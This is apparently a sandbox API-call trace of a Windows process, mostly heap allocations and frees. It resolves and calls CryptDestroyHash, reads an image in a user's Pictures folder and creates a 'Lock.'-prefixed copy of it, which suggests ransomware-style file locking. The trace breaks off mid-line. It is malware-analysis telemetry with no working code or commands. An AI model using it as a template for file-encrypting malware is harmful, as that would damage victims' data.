[0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0247.963] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.963] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0247.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ac8 [0247.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0247.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0247.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0247.964] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0247.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0247.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.964] CryptDestroyHash (hHash=0xa87250) returned 1 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0247.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0247.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0247.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0247.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.966] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0247.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0247.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0247.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0247.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0247.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0247.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0247.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/BspkZBQYHi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bspkzbqyhi.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0247.970] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.970] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0247.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0247.971] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0247.971] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0247.971] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0247.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.972] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0247.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0247.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0247.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0247.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.972] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.BspkZBQYHi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.bspkzbqyhi.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0247.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 